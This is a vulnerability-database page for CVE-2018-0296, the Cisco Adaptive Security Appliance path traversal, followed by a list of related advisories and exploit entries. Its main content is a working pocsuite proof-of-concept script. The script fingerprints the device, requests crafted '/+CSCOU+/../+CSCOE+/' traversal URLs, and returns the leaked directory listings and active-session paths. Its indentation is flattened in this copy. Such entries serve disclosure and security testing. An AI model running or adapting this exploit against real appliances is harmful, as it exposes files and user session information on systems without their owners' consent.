Lucene search
My SeebugSSV:97368HistoryJun 22, 2018 - 12:00 a.m.
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
2018-06-2200:00:00
My Seebug
www.seebug.org
110
0.974 High
EPSS
Percentile
99.9%
#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import urlparse
class TestPOC(POCBase):
name = "Cisco Adaptive Security Appliance - Path Traversal"
vulID = 'CVE-2018-0296'
author = ['sebao']
vulType = 'Path Traversal'
version = '1.0' # default version: 1.0
references = ''
desc = ''
vulDate = ''
createDate = '2018-06-22'
updateDate = '2018-06-22'
appName = 'Cisco Adaptive'
appVersion = ''
dork="/+CSCOE+/logon.html"
appPowerLink = ''
samples = []
def _attack(self):
return self._verify(self)
def _verify(self):
'''verify mode'''
result = {}
filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
logon = "/+CSCOE+/logon.html"
is_cisco_asa = req.get(urlparse.urljoin(self.url, logon), verify=False, allow_redirects=False)
if "webvpnLang" in is_cisco_asa.cookies:
filelist_r = req.get(urlparse.urljoin(self.url, filelist_dir), verify=False)
CSCOE_r = req.get(urlparse.urljoin(self.url, CSCOE_dir), verify=False)
active_sessions_r = req.get(urlparse.urljoin(self.url, active_sessions), verify=False)
if str(filelist_r.status_code) == "200" and filelist_r and CSCOE_r:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['filelist'] = filelist_r.text
result['VerifyInfo']['CSCOE'] = CSCOE_r.text
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
Related
checkpoint_advisories
checkpoint_advisories
packetstorm
packetstorm
Cisco Adaptive Security Appliance Path Traversal
2018-06-28 00:00:00
Cisco Adaptive Security Appliance Path Traversal
2018-07-23 00:00:00
Cisco Adaptive Security Appliance Path Traversal
2019-08-12 00:00:00
zdt
zdt
Cisco Adaptive Security Appliance - Path Traversal Exploit
2018-06-29 00:00:00
Cisco Adaptive Security Appliance - Path Traversal Exploit
2019-08-12 00:00:00
Cisco Adaptive Security Appliance Path Traversal Exploit
2018-07-24 00:00:00
hackerone
hackerone
ok.ru: Cisco ASA Denial of Service & Path Traversal (CVE-2018-0296)
2018-07-06 23:44:08
U.S. Dept Of Defense: https://âââââââââ Vulnerable to CVE-2018-0296 Cisco ASA Path Traversal Authentication Bypass
2019-06-20 18:51:49
VK.com: CVE-2018-0296
2018-07-05 14:14:30
cvelist
cvelist
CVE-2018-0296
2018-06-07 12:00:00
cisco
cisco
prion
prion
Directory traversal
2018-06-07 12:29:00
talosblog
talosblog
Cisco ASA DoS bug attacked in wild
2019-12-20 11:33:44
DNS Hijacking Abuses Trust In Core Internet Service
2019-04-18 16:08:25
exploitpack
exploitpack
Cisco Adaptive Security Appliance - Path Traversal
2018-06-28 00:00:00
Cisco Adaptive Security Appliance - Path Traversal (Metasploit)
2019-08-12 00:00:00
nessus
nessus
Cisco FTD Web Services DoS (cisco-sa-20180606-asaftd)
2019-04-19 00:00:00
Cisco ASA Web Services DoS (cisco-sa-20180606-asaftd)
2018-06-25 00:00:00
cisa_kev
cisa_kev
Cisco Adaptive Security Appliance (ASA) Denial-of-Service Vulnerability
2021-11-03 00:00:00
cve
cve
CVE-2018-0296
2018-06-07 12:29:00
nuclei
nuclei
Cisco ASA - Local File Inclusion
2020-04-22 06:42:01
attackerkb
attackerkb
Cisco ASA Directory Traversal
2018-06-07 00:00:00
exploitdb
exploitdb
Cisco Adaptive Security Appliance - Path Traversal
2018-06-28 00:00:00
Cisco Adaptive Security Appliance - Path Traversal (Metasploit)
2019-08-12 00:00:00
ics
ics
Rockwell Automation Allen-Bradley Stratix 5950
2018-07-03 12:00:00
